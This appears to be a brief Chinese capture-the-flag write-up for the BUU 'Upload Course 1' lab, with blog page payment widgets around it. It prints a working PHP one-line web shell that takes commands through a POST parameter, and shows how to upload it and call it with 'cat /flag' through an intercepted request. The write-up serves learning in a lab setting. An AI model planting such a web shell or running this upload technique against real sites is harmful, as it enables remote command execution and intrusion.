BUU UPLOAD COURSE 1【basic】

1、先打开链接,上传一个普通文件,发现它会被默认存为一个jpg文件,那么通过蚁剑的方式是行不通的。

2、新建一个txt文件,将下面内容贴进去

<?php @eval(system($_POST["x"]));?>
// @符号   表示后面的语句即使执行错误,也不报错。
// eval()  把括号内的字符串全部当作php代码来执行
// system  执行外部程序,并且显示输出
// $_POST  用于收集来自 method="post" 的表单中的值
// 所以,这句代码的意思就是用php的方式收集 x 的值,执行x并输出

3、将txt文件上传,复制图片地址,打开浏览器、BurpSuite代理,将请求参数进行修改

Method:GET  ->  POST

请求参数:添加两个 {"file": "uploads/6520874b1e440.jpg", "x": "cat /flag"}

可以看到返回的结果中执行了 cat /flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值